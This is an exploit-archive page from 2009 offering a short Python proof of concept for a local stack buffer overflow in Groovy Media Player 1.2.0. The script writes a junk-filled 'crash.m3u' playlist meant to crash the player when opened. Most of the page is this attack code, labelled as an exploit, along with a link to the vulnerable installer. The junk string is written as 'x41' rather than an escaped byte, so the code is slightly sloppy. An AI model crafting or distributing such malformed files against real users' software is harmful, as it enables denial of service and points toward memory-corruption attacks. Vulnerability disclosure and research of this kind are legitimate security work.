[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Groovy Media Player 1.2.0 (.m3u) Local Buffer Overflow PoC
# Published : 2009-08-06
# Author : opt!x hacker
# Previous Title : FreeBSD 7.2-RELEASE SCTP Local Kernel Denial of Service Exploit
# Next Title : ImTOO MPEG Encoder 3.1.53 (.cue/.m3u) Local Buffer Overflow PoC
#!/usr/bin/python
print "Groovy Media Player 1.2.0 (.m3u) local stack overlow POC"
print " finded by : opt!x hacker <optix@9.cn> "
print "download: http://www.bestwebsharing.com/downloads/groovy-media-player-setup.exe "
junk = "x41"*213
file=open("crash.m3u","w")
file.write(junk)
file.close()
# www.Syue.com [2009-08-06]